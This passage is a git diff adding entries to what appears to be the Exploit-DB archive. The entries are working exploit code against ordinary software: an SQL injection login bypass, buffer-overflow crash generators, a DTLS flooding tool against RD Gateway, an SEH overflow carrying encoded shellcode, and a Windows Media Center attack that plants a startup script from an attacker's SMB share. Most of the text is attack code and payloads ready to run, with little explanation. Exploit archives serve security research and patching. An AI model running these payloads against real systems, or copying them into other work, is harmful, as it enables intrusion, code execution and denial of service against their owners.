gzip, deflate +Referer: https://XXX.XXX.XXX.XXX/admin/login +Content-Type: application/x-www-form-urlencoded +Content-Length: 50 +Connection: close +Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 +Upgrade-Insecure-Requests: 1 + +login=USERNAME&password=PASSWORD \ No newline at end of file diff --git a/exploits/php/webapps/48605.txt b/exploits/php/webapps/48605.txt new file mode 100644 index 000000000..8236a21d3 --- /dev/null +++ b/exploits/php/webapps/48605.txt @@ -0,0 +1,20 @@ +# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass +# Google Dork: N/A +# Exploit Author: Prof. Kailas PATIL (krp) +# Date: 2020-06-18 +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ +# Version: v1.0 +# Category: Webapps +# Tested on: LAMP for Linux + +# Description: +# Password and username parameters have sql injection vulnerability in Admin login panel. +# +#------------------------------------------------------ +# +# Login Link: http://localhost/bpms/admin/index.php +# username: ' or '1'='1'# +# password: blah123 +# +#------------------------------------------------------ \ No newline at end of file diff --git a/exploits/watchos/dos/47404.pl b/exploits/watchos/dos/47404.pl new file mode 100755 index 000000000..414d4f295 --- /dev/null +++ b/exploits/watchos/dos/47404.pl @@ -0,0 +1,27 @@ +# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS) +# Exploit Author: Emilio Revelo +# Date: 2019-09-20 +# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe +# Tested on: Windows 10 Pro x64 es + +# Steps to produce the DoS: + +# 1.- Run perl script : perl SpotIE.pl +# 2.- Open SpotIE.txt and copy the content to clipboard +# 3.- Open SpotIE Internet Explorer Password Recovery +# 4.- Navigate to Register -> Enter the registration name and key below... +# 5.- Paste ClipBoard on "Key:" +# 7.- OK +# 8.- Crashed!! + +#!/usr/local/bin/perl + +use strict; +use warnings; + +my $filename = 'SpotIE.txt'; +open(my $fh, '>', $filename) or die "Could not open file '$filename' $!"; +print $fh "E"x256; +close $fh; +print "Done!\n"; +print "File: SpotIE.txt\n" \ No newline at end of file diff --git a/exploits/watchos/dos/47406.py b/exploits/watchos/dos/47406.py new file mode 100755 index 000000000..acb514837 --- /dev/null +++ b/exploits/watchos/dos/47406.py @@ -0,0 +1,30 @@ +# Exploit Title: InputMapper < 1.6.10 Local Denial of Service +# Date: 20.09.2019 +# Vendor Homepage: https://inputmapper.com/ +# Software Link: https://inputmapper.com/downloads/category/2-input-mapper +# Exploit Author: elkoyote07 +# Tested Version: 1.6.10 +# Tested on: Windows 10 x64 + + +# 1.- Start Input Mapper +# 2.- Click on Guest (Top left) +# 3.- Click on Login +# 3.- Copy the content of exploit.txt in the Username field +# 4.- Once copied double-click on Username field +# 5.- Happy crash :) + + + + +#!/usr/bin/python + +t = "A" * 15000 + +try: +f=open("exploit.txt","w") +f.write(t) +f.close() +print "Done" +except: +print "Error" \ No newline at end of file diff --git a/exploits/windows/dos/47393.txt b/exploits/windows/dos/47393.txt new file mode 100644 index 000000000..1295bbcf5 --- /dev/null +++ b/exploits/windows/dos/47393.txt @@ -0,0 +1,35 @@ +# Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file. +# Google Dork: N/A +# Date: 2019-09-14 +# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) +# Vendor Homepage: https://notepad-plus-plus.org/ +# Version: < 7.7 +# Tested on: Windows x64 +# CVE : CVE-2019-16294 + +# Description: + +SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. + +Open aaaaa.ml via affected notepad++ + +POC files: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47393.zip + +Result: + +(230.c64): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll - +rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa +rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff +rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81 +r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9 +r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000 +r14=0000000000000001 r15=0000000000000002 +iopl=0 nv up ei pl zr na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +SciLexer!Scintilla_DirectFunction+0x950dd: +00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=???? \ No newline at end of file diff --git a/exploits/windows/dos/47795.py b/exploits/windows/dos/47795.py new file mode 100755 index 000000000..e8d5f1363 --- /dev/null +++ b/exploits/windows/dos/47795.py @@ -0,0 +1,26 @@ +# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) +# Date: 2019-12-18 +# Exploit Author: Chris Inzinga +# Vendor Homepage: http://www.bimesoft.com/ +# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml +# Version: 2.2.0.103 +# Tested on: Windows 7 SP1 (x86) + +# Steps to reproduce: +# 1. Generate a malicious payload via the PoC +# 2. In the application set the 'Start Page URL' to any value, it doesn't matter. +# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'. +# 4. Observe a program DOS crash, overwriting SEH=20 + +#!/usr/bin/python + +payload =3D "A" * 382 + "B" * 4 + "C" * 4 + +try: + fileCreate =3Dopen("exploit.txt","w") + print("[x] Creating file") + fileCreate.write(payload) + fileCreate.close() + print("[x] File created") +except: + print("[!] File failed to be created") \ No newline at end of file diff --git a/exploits/windows/dos/47801.py b/exploits/windows/dos/47801.py new file mode 100755 index 000000000..71c416ffa --- /dev/null +++ b/exploits/windows/dos/47801.py @@ -0,0 +1,21 @@ +# Exploit Title: XnConvert 1.82 - Denial of Service (PoC) +# Date: 2019-12-21 +# Vendor Homepage: https://www.xnview.com +# Software Link: https://www.xnview.com/en/apps/ +# Exploit Author: Gokkulraj (TwinTech Solutions) +# Tested Version: v1.82 +# Tested on: Windows 7 x64 + +# 1.- Download and install XnConvert +# 2.- Run python code : XnConvert.py +# 3.- Open EVIL.txt and copy content to clipboard +# 4.- Open XnConvert and Click 'EnterKey' +# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' +# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash. + +#!/usr/bin/env python +Dos= "\x41" * 9000 +myfile=open('Evil.txt','w') +myfile.writelines(Dos) +myfile.close() +print("File created") \ No newline at end of file diff --git a/exploits/windows/dos/47849.py b/exploits/windows/dos/47849.py new file mode 100755 index 000000000..f55905f03 --- /dev/null +++ b/exploits/windows/dos/47849.py @@ -0,0 +1,33 @@ +# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install SpotFTP +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.SpotFTP Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47872.py b/exploits/windows/dos/47872.py new file mode 100755 index 000000000..fd5ded707 --- /dev/null +++ b/exploits/windows/dos/47872.py @@ -0,0 +1,33 @@ +# Exploit Title: SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install SpotDialup +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.SpotDialup Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47963.cpp b/exploits/windows/dos/47963.cpp new file mode 100644 index 000000000..d4f80d734 --- /dev/null +++ b/exploits/windows/dos/47963.cpp @@ -0,0 +1,135 @@ +#include "BlueGate.h" + +/* +EDB Note: +- Download (Source) ~ +- Download (Binary) ~ +*/ + + +void error(const char* msg) +{ + printf("ERROR: %s\n", msg); + exit(EXIT_FAILURE); +} + +void SOCKInit() +{ + WSADATA wsaData; + int res; + + res = WSAStartup(MAKEWORD(2, 2), &wsaData); + + if (res != 0) + error("WSAStartup failed"); +} + +void DTLSInit() +{ + SSL_library_init(); + SSL_load_error_strings(); + ERR_load_BIO_strings(); + OpenSSL_add_all_algorithms(); +} + +int OpenUDPConnection(const char* hostname, int port) +{ + int sockfd; + sockaddr_in addr; + + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + if (sockfd < 0) + error("Failed to open socket"); + + addr.sin_family = AF_INET; + addr.sin_port = htons(port); + + inet_pton(AF_INET, hostname, &(addr.sin_addr)); + + if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0) + { + closesocket(sockfd); + error("Failed to connect socket"); + } + + return sockfd; +} + +SSL* DTLSConnection(const char* hostname) +{ + int sockfd; + int result; + DTLSParams client; + + sockfd = OpenUDPConnection(hostname, 3391); + + client.ctx = SSL_CTX_new(DTLS_client_method()); + client.bio = BIO_new_ssl_connect(client.ctx); + + BIO_set_conn_hostname(client.bio, hostname); + BIO_get_ssl(client.bio, &(client.ssl)); + + SSL_set_connect_state(client.ssl); + SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY); + + SSL_set_fd(client.ssl, sockfd); + + if (SSL_connect(client.ssl) != 1) { + return NULL; + } + + return client.ssl; +} + +int send_dos_packet(SSL* ssl, int id) { + CONNECT_PKT_FRAGMENT packet; + + packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT; + packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER); + packet.usFragmentID = id; + packet.usNoOfFragments = id; + packet.cbFragmentLength = 1000; + memset(packet.fragment, 0x41, 1000); + + char pkt[sizeof(packet)]; + memcpy(&pkt, &packet, sizeof(packet)); + + return SSL_write(ssl, pkt, sizeof(pkt)); +} + +int main(int argc, char* argv[]) +{ + + SSL* ssl; + int i = 0; + char* hostname; + + if (argc != 2) { + printf("Usage: %s \n", argv[0]); + return 0; + } + + hostname = argv[1]; + + SOCKInit(); + DTLSInit(); + + while (i++ > -1) { + ssl = DTLSConnection(hostname); + + if (ssl == NULL) { + break; + } + + for (int n = 0; n < 4; n++) { + send_dos_packet(ssl, i+n); + printf("Sending packet [%u]\n", i + n); + } + + i++; + } + + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/47411.py b/exploits/windows/local/47411.py new file mode 100755 index 000000000..e50c58800 --- /dev/null +++ b/exploits/windows/local/47411.py @@ -0,0 +1,87 @@ +#!/usr/bin/python + +# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow +# Date: 9/23/2019 +# Exploit Author: x00pwn +# Vendor Homepage: http://www.sharing-file.com/ +# Software Link: http://www.sharing-file.com/efssetup.exe +# Version: 7.2 +# Tested on: Windows 7 + +# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow +# by creating a malicious username, this exploit POC will create a malicious text file +# with the contents to execute arbitrary code. +# Author : Nu11pwn + +badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" +"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" +"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" +"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" +"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" +"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") + +# found bad chars - "\x00\x0a\x0d" + +shellcode = "" +shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e" +shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e" +shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35" +shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80" +shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89" +shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39" +shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba" +shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88" +shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8" +shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3" +shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46" +shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed" +shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a" +shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1" +shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0" +shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6" +shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a" +shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff" +shellcode += "\xed\xe7\xf7\xff" + +# Log data, item 69 +# Address=0BADF00D +# Message= 0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) + +# Log data, item 24 +# Address=100195F2 +# Message= 0x100195f2 : pop esi # pop ecx # ret | {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) + +nseh = "\xEB\x06\x90\x90" +seh = "\xF2\x95\x01\x10" + +payload = "A" * 4059 +payload += nseh +payload += seh +payload += "\x90" * 16 +payload += shellcode +payload += "D" *4000 + +# SEH chain of main thread, item 1 +# Address=46336646 +# SE handler=*** CORRUPT ENTRY *** + +# Log data, item 34 +# Address=0BADF00D +# Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler +# [*] Exact match at offset 4059 + +try: + evilCreate =open("exploit.txt","w") + print(""" + Easy File Sharing web server SEH overflow + """) + print("[x] Creating malicious file") + evilCreate.write(payload) + evilCreate.close() + print("[x] Malicious file create") + print("[x] Go to user accounts and add a new user with malicious name") + print("[x] Watch the program crash") +except: + print("[!] File failed to be created") \ No newline at end of file diff --git a/exploits/windows/local/47476.py b/exploits/windows/local/47476.py new file mode 100755 index 000000000..2bddfb3aa --- /dev/null +++ b/exploits/windows/local/47476.py @@ -0,0 +1,33 @@ +# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change +# Date: 2019-09-10 +# Exploit Author: Alessandro Magnosi +# Vendor Homepage: http://www.sricam.com/ +# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe +# Version: v3.12.0.1 +# Tested on: Windows 7 + +#!/usr/bin/python + +# Steps to reproduce: +# 1. Generate the payload executing the PoC +# 2. Login in the Sricam DeviceViewer application as any registered user +# 3. Go to System Tools -> Change Password +# 4. Set the old password as the malicious payload, and the new password as whatever you want +# 5. The password will be changed with the new one +# 6. To confirm, restart the application and try to login with the new password + +payload = "A" * 5000 + +try: + bypass = open("bypass.txt","w") + print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass") + print("### Author: Alessandro Magnosi\n") + print("[*] Creating old password file") + bypass.write(payload) + bypass.close() + print("[+] Old password file created\n") + print("[i] When changing password, set the old password to the file contents") + print("[i] Close the program and reopen it") + print("[i] Log in with new password") +except: + print("[!] Error creating the file") \ No newline at end of file diff --git a/exploits/windows/local/47981.txt b/exploits/windows/local/47981.txt new file mode 100644 index 000000000..b0741eb78 --- /dev/null +++ b/exploits/windows/local/47981.txt @@ -0,0 +1,620 @@ +# Exploit Title: Microsoft Windows Media Center WMV or WMA 6.3.9600.16384 - Code Execution +# Google Dork: n/a +# Date: 2020-01-29 +# Exploit Author: Eduardo Braun Prado +# Vendor Homepage: http://www.microsoft.com/ +# Software Link: http://www.microsoft.com/ +# Version: 6.3.9600.16384 +# Tested on: Windows 7, 8.1, 10 +# CVE : N/A +# Discovered by: Eduardo Braun Prado + +# Microsoft Windows Media Center WMV/WMA File FormatParsing Security Bypass Arbitrary Code Execution Vulnerability PoC - C# +[Details] + +Microsoft Windows Media Center, the very popular app still used by many +people, (that can play a variety of file types and originally designed +for playback and recording of TV shows from TV´s cable/antenna) is +affected by an issue that allows malicious people to bypass the current +security standards of the app, + +including modern browser security standards which could ultimately lead +to arbitrary code execution. + +The issue can be exploited through specially crafted 'wma' or 'wmv' file +containing a script instruction called 'URL'. + + +1) Currently Windows Media Center prompts before opening links no matter +what protocol is used (eg. 'http:' versus 'file:') + +If the user accepts the prompt it will be passed to the default web browser. + +2) Windows Media Center allows unsafe 'file:' URIs, which facilitates +attacks that abuses local file system access. + + +By combining these 2 issues attackers may be able to reference a local +html file in the context of MS IE core, which is hosted + +by a Media Center 'plugin' (ehexthost32). Because usually local files +are parsed in the privileged Local Machine security zone, +it´s possible to run arbitrary code on the target system, because: + +- Windows Media Center´s extensibility host (ehexthost32) does not +enable the security feature 'Local Machine Zone Lockdown' +(FEATURE_LOCALMACHINE_LOCKDOWN) + +Therefore attackers might be able to compromise the target system if +they can exploit an Universal Cross Site Scripting (uXSS) issue, + +or plant a file in a predictable location, with custom content. + +If it used the 'FEATURE_LOCALMACHINE_LOCKDOWN', the severity of the +attack could be considerably reduced. + + +2 PoCs are provided. + + +The first assumes the attacker could have already planted an html based +file on the target and the user saved/copied the WMV video +to his/her 'Videos' folder. + +So, by opening Windows Media Center and navigating through the resources +displayed on the screen (click "Videos", then an embedded file browser is + +displayed, so you can click the PoC WMV file) it will start playing the +video and exploit will be triggered. + + +The second involves the target user opening an ASX playlist that +references the first WMV file that could be located on a web site or +SMB/WebDAV location + +and further displaying a picture with text 'Click me'. Upon playing the +first WMV file, an 'HTTP:' URL is displayed (it belongs to the default +'Internet' +security zone of Windows) and by this time the attacker either uses a +predictable file creation issue or a uXSS vulnerability. In case the +attacker does not +have a mean to navigate from the 'Internet' zone to the 'Local Machine' +zone, when the target clicks the picture, the second WMV file is played +and it contains +code to retrieve a local file, using the 'file:' URL protocol. Windows +Media Center was supposed to either changing the location of the current +window or +opening a new one (on the same or new instance of 'Ehexthost32' app), +but due to a "bug" it freezes in the first URL. + +The "FEATURE_ZONE_ELEVATION", used by 'Ehexthost32' app sets additional +security regarding zone elevation blocks, in other words, makes it +harder to navigate +from the 'Internet' (or even 'Trusted Sites' and 'Local Intranet') zone +to the 'Local Machine'. + +The PoCs use the 'System Monitor Control' ActiveX to create a simple WSH +file (shortcut to script files) to the user´s startup dir. +This is possible because code is parsed in the context of the Local +Machine zone ("unlocked") of Windows. + + +[video demo] + +video demo1: https://www.youtube.com/watch?v=ubom8OMjfDw + +video demo2: https://www.youtube.com/watch?v=ECto30VbiHk + + +[PoC] + +Instructions: + + - Create a new project on MS Visual Studio (any version, included free +ones like 'Express'), choose 'Console Application' + +and at 'program . cs' replace the code with the code below; After +compiled, the binary can be run without parameters (creates PoC1) or +with 3 parameters which are: + +1) remote URL: an internet address you wish, eg. your website...it +could have eg. code to plant a predictable file on the target. +2) local URL: a 'file:' based address to referenced an arbitrary local +file (eg. you could have just planted a predictable file, now you wish +to retrieve it) +3) SMB path: path to your SMB server (must allow anonymous access) where +a custom script file is located and will be run on next boot. + +Note: Source code targets dot NET 4.0 and up (previous versions might +work fine though!) + + +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; +using System.Threading.Tasks; +using System.Runtime.Remoting.Metadata.W3cXsd2001; + +namespace wmc_wmv +{ + class Program + { + static void Main(string[] args) + { + String exeDir = AppDomain.CurrentDomain.BaseDirectory; + Directory.SetCurrentDirectory(exeDir); + + string welcome = "\n\n +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n Microsoft Windows Media Center '.wmv' Security Bypass Vulnerability +Arbitrary Code Execution \n\n by: Eduardo Braun Prado \n\n +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"; + + string howto = "\n\n Usage: wmc_wmv URL_Remote URL_Local +SMBPath \n\n\n Note: If you don´t pass any arguments, we use PoC1."; + + + string t1 = "31"; + string t2 = "32"; + + string wmvs = +"3026B2758E66CF11A6D900AA0062CE6CE8140000000000000900000001024052D1861D31D011A3A400A0C90348F61C010000000000004152D1861D31D011A3A400A0C90348F60200000001000500560043002D00310000001600560043002D003100200041006400760061006E006300650064002000500072006F00660069006C006500000004005756433102002400570069006E0064006F007700730020004D006500640069006100200041007500640069006F002000310030002000500072006F00660065007300730069006F006E0061006C0000002E0020003600340020006B006200700073002C0020003400340020006B0048007A002C002000320020006300680061006E006E0065006C002000310036002000620069007400200031002D0070006100730073002000430042005200000002006201A1DCAB8C47A9CF118EE400C00C20536568000000000000000B3206305BC9F44391D3DE3DB933D540384802000000000090F71001BFCFD50109000000000000001076250900000000504DBA0700000000B80B00000000000002000000803E0000803E0000CCFC4600B503BF5F2EA9CF118EE300C00C2053652D0E00000000000011D2D3ABBAA9CF118EE600C00C2053650600FF0D00005D8BF1268445EC479F5F0E651F0452C91A000000000000000201EACBF8C5AF5B77488467AA8C44FA4CCA56010000000000000600000001000C00020002000000490073005600420052000000000000000100340000000600000044006500760069006300650043006F006E0066006F0072006D0061006E0063006500540065006D0070006C0061007400650000004D0030000000000002000C00020002000000490073005600420052000000010000000200340000000C00000044006500760069006300650043006F006E0066006F0072006D0061006E0063006500540065006D0070006C0061007400650000004100500040004C0031000000000001002E0003000400000057004D002F0057004D0041004400520043005000650061006B005200650066006500720065006E006300650000000200000000000100280003000400000057004D002F0057004D0041004400520043005000650061006B0054006100720067006500740000000200000074D40618DFCA0945A4BA9AABCB96AAE88D0B0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CBA5E61472C632438399A96952065B5A58000000000000000000000000000000000000000000000018FA00002B0600000000000018FA00002B060000000000009D0B00000200000001000000C98E29000000000000000000CBA5E61472C632438399A96952065B5A84000000000000000000000000000000000000000000000040A62800B80B000000000000A8B74500A00F0000000000001B0A00000200000002000000292C0A00000000000000020054E51E1BEAF9C84B821A376B74E4C4B80200000000005094BDC67F86074983A3C77921B733AD02000000000020DEAAD9177C9C4FBC288555DD98E2A22600000000000000000000000000000000000000000040A4D0D207E3D21197F000A0C95EA850640100000000000005001C0057004D004600530044004B00560065007200730069006F006E00000000002000310032002E0030002E0037003600300031002E003100370035003100340000001A0057004D004600530044004B004E006500650064006500640000000000160030002E0030002E0030002E0030003000300030000000120056004200520020005000650061006B00000003000400A8B745000C00490073005600420052000000020004000100000028004100530046004C00650061006B0079004200750063006B0065007400500061006900720073000000010072000000C05D00002074000030750000CB520000C8AF00005926000090E20000B513000000C201005704000080A9030015020000305705006D01000020A107000001000090230B00AF00000040420F0080000000C05C15005B0000